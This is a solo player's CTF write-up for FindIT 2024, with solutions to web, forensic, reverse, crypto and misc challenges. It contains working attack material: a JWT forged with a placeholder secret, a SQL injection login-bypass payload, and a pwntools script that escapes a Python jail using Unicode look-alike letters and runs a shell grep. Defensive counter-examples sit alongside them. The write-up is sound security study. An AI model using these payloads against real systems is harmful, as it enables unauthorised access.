# FindIT 2024

Playing solo as the N2L team.

| Chall                                          | Category |
| ---------------------------------------------- | -------- |
| [#kue](#kue "mention")                         | web      |
| [#login-dulu](#login-dulu "mention")           | web      |
| [#bagas-dribble](#bagas-dribble "mention")     | forensic |
| [#file-kosong](#file-kosong "mention")         | forensic |
| [#image-cropper](#image-cropper "mention")     | forensic |
| [#is\_this\_python](#is_this_python "mention") | reverse  |
| [#how-to-decrypte](#how-to-decrypte "mention") | crypto   |
| [#your-journey](#your-journey "mention")       | misc     |
| [#neobim](#neobim "mention")                   | misc     |

## Kue

concept: basic JWT web exploitation

Just edit the roles claim in the token, changing it to admin, and sign it with the secret `your_secret`.
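Why this works, seen from the server's side, as an added example that is not the challenge's code: it assumes the token uses HS256 and a `roles` claim, and the sample token and the deny-list are constructed. It also shows a startup check that would refuse a placeholder signing key.

```python
import base64, hashlib, hmac, json, secrets

PLACEHOLDERS = {"your_secret", "secret", "changeme"}  # constructed deny-list

def _b64url(data: bytes) -> str:
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode()

def _unb64url(text: str) -> bytes:
    return base64.urlsafe_b64decode(text + "=" * (-len(text) % 4))

def _mac(signing_input: str, secret: bytes) -> bytes:
    return hmac.new(secret, signing_input.encode(), hashlib.sha256).digest()

def sign_hs256(claims: dict, secret: bytes) -> str:
    head = _b64url(json.dumps({"alg": "HS256", "typ": "JWT"}).encode())
    body = _b64url(json.dumps(claims).encode())
    signing_input = f"{head}.{body}"
    return f"{signing_input}.{_b64url(_mac(signing_input, secret))}"

def verify_hs256(token: str, secret: bytes):
    """Return the claims when the HS256 signature is valid, otherwise None."""
    try:
        head, body, sig = token.split(".")
        if json.loads(_unb64url(head)).get("alg") != "HS256":
            return None
        if not hmac.compare_digest(_mac(f"{head}.{body}", secret), _unb64url(sig)):
            return None
        return json.loads(_unb64url(body))
    except (ValueError, AttributeError):  # malformed token, base64 or JSON
        return None

def secret_is_acceptable(secret: bytes) -> bool:
    """Startup check: not a placeholder, and at least 256 bits (RFC 7518, 3.2)."""
    return len(secret) >= 32 and secret.decode(errors="replace") not in PLACEHOLDERS

# Constructed token: roles edited to admin, signed with the placeholder secret.
EDITED = sign_hs256({"user": "guest", "roles": "admin"}, b"your_secret")

if __name__ == "__main__":
    strong = secrets.token_bytes(32)
    print("placeholder key:", verify_hs256(EDITED, b"your_secret"))  # claims accepted
    print("random key:     ", verify_hs256(EDITED, strong))          # None
    print("startup check:  ", secret_is_acceptable(b"your_secret"), secret_is_acceptable(strong))
```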

## login-dulu

concept: SQLi; we must supply the username admin and bypass the password check

Username: `admin`

Password: `" union select rootpage, type, name from sqlite_master --`
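The login check this input defeats, next to its parameterized form, as an added example that is not the challenge's code: the `users` schema, the three-column query and the stored password are assumptions, chosen so that the three-column `union` above lines up.

```python
import sqlite3

# Password value quoted in the writeup (the username is simply "admin").
PAYLOAD = '" union select rootpage, type, name from sqlite_master --'

def make_db() -> sqlite3.Connection:
    """In-memory stand-in for the challenge database (schema is assumed)."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT)")
    db.execute("INSERT INTO users (username, password) VALUES ('admin', 'not-the-real-one')")
    return db

def login_concat(db, username: str, password: str) -> bool:
    """Vulnerable form: user input is pasted into the SQL text."""
    query = ('SELECT id, username, password FROM users '
             f'WHERE username = "{username}" AND password = "{password}"')
    return db.execute(query).fetchone() is not None

def login_bound(db, username: str, password: str) -> bool:
    """Hardened form: values are bound as parameters and never parsed as SQL."""
    query = "SELECT id, username, password FROM users WHERE username = ? AND password = ?"
    return db.execute(query, (username, password)).fetchone() is not None

def compare(username: str, password: str) -> tuple:
    """Return (vulnerable result, hardened result) for the same credentials."""
    db = make_db()
    return login_concat(db, username, password), login_bound(db, username, password)

if __name__ == "__main__":
    print("payload       ->", compare("admin", PAYLOAD))             # (True, False)
    print("wrong guess   ->", compare("admin", "guess"))             # (False, False)
    print("real password ->", compare("admin", "not-the-real-one"))  # (True, True)
```

The concatenated query returns a row from `sqlite_master` even though no user row matches, so a check that only tests for "any row" passes; the bound query compares the whole payload as a literal password and finds nothing.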

## bagas-dribble

concept: basic stego

Just run `strings` on the file and the flag shows up.

## file kosong

foren/file kosong

concept : finding pattern

```python
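# Paste the file's hex dump here (space-separated bytes)
s = """Put the file's hex here"""
# EM SPACE (U+2003, UTF-8 E2 80 83) encodes a 0 bit, a plain space (0x20) a 1 bit
s = s.replace('E2 80 83', '0').replace('20', '1').replace(' ', '')
# Decode the bitstring 8 bits at a time
for i in range(0, len(s), 8):
    print(chr(int(s[i:i+8], 2)), end='')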
```

## image cropper

concept: recover the image from the WAV, then LSB decoding

```python
from PIL import Image
import numpy as np
import scipy.io.wavfile as wavfile

def restore_image(wav_input_path):
    # Read the WAV file
    sample_rate, audio_signal = wavfile.read(wav_input_path)

    # Extract red, green, and blue channels from the audio signal
    red_channel = audio_signal[::3]
    green_channel = audio_signal[1::3]
    blue_channel = audio_signal[2::3]

    # Reshape and normalize the channels
    red_channel = ((red_channel + 1) / 2 * 255).astype(np.uint8)
    green_channel = ((green_channel + 1) / 2 * 255).astype(np.uint8)
    blue_channel = ((blue_channel + 1) / 2 * 255).astype(np.uint8)

    # Combine channels to reconstruct the image
    image_size = int(np.sqrt(len(red_channel)))
    image_data = np.column_stack((red_channel, green_channel, blue_channel)).reshape((image_size, image_size, 3))
    # Build the image in memory; only its pixel values are needed
    restored_image = Image.fromarray(image_data, 'RGB')
    pixels = list(restored_image.getdata())

    # Per-channel (R, G, B) value that decodes to "0"; any other value decodes to "1"
    zero_values = (11, 11, 12)
    x = ""
    for cc, pixel in enumerate(pixels):
        for channel, zero in zip(pixel, zero_values):
            x += "0" if channel == zero else "1"
        # Dump the bitstring collected from the first 251 pixels
        if cc == 250:
            print(x)

    print("Image restored successfully!")

if __name__ == "__main__":
    restore_image("encoded.wav")
```

## is\_this\_python

concept : reversing pyc

```python
# Define a key
key = '2024' + 'findit'

# Encoded flag values (decimal)
flag_enc = [113, 100, 116, 79, 4, 89, 2, 80, 54, 66, 83, 92, 3, 107, 8, 80, 9, 11, 54, 16, 93, 1, 83, 90, 82, 7, 49, 80, 80, 71, 10, 1, 1, 73]

# Initialize an empty list to store the key characters
key_arr = []

# Extract characters from the key and append their ASCII values to key_arr
for character in key:
    character = ord(character)
    key_arr.append(character)

# Initialize an empty list to store the flag in decimal form
flag_arr = []

# Copy the encoded values into flag_arr as integers
for hex_val in flag_enc:
    hex_val = int(hex_val)
    flag_arr.append(hex_val)

# Extend key_arr if its length is less than flag_arr
while len(flag_arr) > len(key_arr):
    key_arr.extend(key_arr)

# Initialize an empty list to store the flag in decimal form after XOR operation
flag_dec = []

# Perform XOR operation between corresponding elements of key_arr and flag_arr
for k, f in zip(key_arr, flag_arr):
    xored = k ^ f
    flag_dec.append(xored)

# Convert the decimal values to text characters
flag_dec_text = ''.join(map(chr, flag_dec))

# Print the result
print(flag_dec_text)

```

## your-journey

concept: pyjail restriction bypass using unique (Unicode) characters

```python
from pwn import *
context.log_level="ERROR"
io = remote("103.191.63.187", 1337)  # Change IP and PORT
io.sendlineafter(b"$ ", '𝘣𝘳𝘦𝘢𝘬𝘱𝘰𝘪𝘯𝘵'.encode())
io.sendlineafter(b"(Pdb) ",b"import os;os.system('grep -ra \"FindIT\"')")
print(io.recv().decode())
```
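Why a text blocklist misses this input, and a check that does not, as an added example that is not the challenge's code: the blocklist and both filter functions are assumptions, since the page does not show the jail's source.

```python
import ast
import unicodedata

BLOCKED = {"breakpoint", "eval", "exec", "open", "__import__"}  # assumed blocklist

# "breakpoint" written in Mathematical Sans-Serif Italic letters (U+1D622 is 'a'),
# look-alike characters of the kind the payload above uses.
STYLED = "".join(chr(0x1D622 + ord(c) - ord("a")) for c in "breakpoint")

def naive_allows(line: str) -> bool:
    """Assumed jail check: refuse only if a blocked word appears verbatim."""
    return not any(word in line for word in BLOCKED)

def names_after_parsing(line: str) -> set:
    """Identifiers as the compiler sees them; Python NFKC-normalises them (PEP 3131)."""
    tree = ast.parse(line, mode="eval")
    names = {n.id for n in ast.walk(tree) if isinstance(n, ast.Name)}
    return names | {n.attr for n in ast.walk(tree) if isinstance(n, ast.Attribute)}

def hardened_allows(line: str) -> bool:
    """Check the parsed names instead of the raw text. A blocklist is still a weak
    control; this only closes the normalisation gap."""
    try:
        return names_after_parsing(line).isdisjoint(BLOCKED)
    except (SyntaxError, ValueError):
        return False

if __name__ == "__main__":
    line = STYLED + "()"
    print("NFKC form:       ", unicodedata.normalize("NFKC", line))
    print("naive filter:    ", naive_allows(line))
    print("parser sees:     ", names_after_parsing(line))
    print("hardened filter: ", hardened_allows(line))
```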

## how to decrypte?

```python
def caesar_decrypt(ciphertext):
    plaintext = ""
    for char in ciphertext:
        if char.isalpha():
            ascii_offset = ord('A') if char.isupper() else ord('a')
            # Shift every letter back by 4 positions, wrapping around the alphabet
            decrypted_char = chr((ord(char) - ascii_offset - 4) % 26 + ascii_offset)
            plaintext += decrypted_char
        else:
            # Digits, braces and underscores are left unchanged
            plaintext += char
    return plaintext

print(caesar_decrypt("JmrhMXGXJ{al4x_h03w_G43w4v_Hs_57lnkrzh8x5}"))
```

## neobim

```python
import httpx

URL = "https://discordapp.com/"

class BaseAPI:
    def __init__(self, url=URL) -> None:
        self.c = httpx.Client(base_url=url, follow_redirects=True)
    def get_assets(self, appid):
        return self.c.get(f"/api/oauth2/applications/{appid}/assets")
    def get_asset(self, appid, assetid):
        return self.c.get(f"https://cdn.discordapp.com/app-assets/{appid}/{assetid}.png")

class API(BaseAPI):
    ...

if __name__ == "__main__":
    api = API()
    appid = "1233467180696207390"
    res = api.get_assets(appid)
    for asset in res.json():
        res = api.get_asset(appid, asset["id"])
        with open(asset["name"]+".png", "wb") as f:
            f.write(res.content)
```

Get the appid from the README.


